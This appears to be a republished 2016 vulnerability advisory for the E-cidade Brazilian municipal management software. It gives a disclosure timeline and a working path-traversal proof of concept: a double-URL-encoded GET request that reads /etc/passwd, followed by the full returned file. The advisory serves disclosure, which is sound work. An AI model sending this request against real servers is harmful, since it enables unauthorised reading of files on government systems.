`Vendor: DBSeller (www.dbseller.com.br)
Product: E-cidade - Software Publico de Gestão Municipal
Published: 02/19/2016
Discovered by vesp3r ([email protected])
Product Description
--------------------
Intended to computerize the management of Brazilian Municipalities.
This includes computerized integration between municipal entities: City Hall, Town Hall, Local Government, Foundations and others.
The economy of resources is only one of the advantages in the adoption of e-cidade and the freedom of choice of suppliers and ensuring
continuity of the system, once supported by the Ministry of Planning.
Advisory Timeline
-----------------
02/18/2016 - Vendor notified
02/19/2016 - Vendor asked for more details
02/19/2016 - Information and PoC sent
02/20/2016 - Advisory was published
Vulnerability
-------------
An unauthenticated user is able to access files and directories,
the vulnerability can be exploited by issuing a specially crafted HTTP GET
request utilizing a simple url encoding bypass(..%252f)
Proof of Concept
---------------
GET /e-cidade/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1
[Snip...]
Accept-Encoding: gzip, deflate
Connection: close
Response:
HTTP/1.1 200 OK
Date: Fri, 19 Feb 2016 02:27:29 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.14
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
X-Pad: avoid browser bug
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:108::/nonexistent:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
postgres:x:105:113:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ecidade:x:1001:1001:eCidade,,,:/home/ecidade:/bin/bash
dbseller:x:1000:1000:DBSeller,,,:/home/dbseller:/bin/bash
postfix:x:107:116::/var/spool/postfix:/bin/false
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation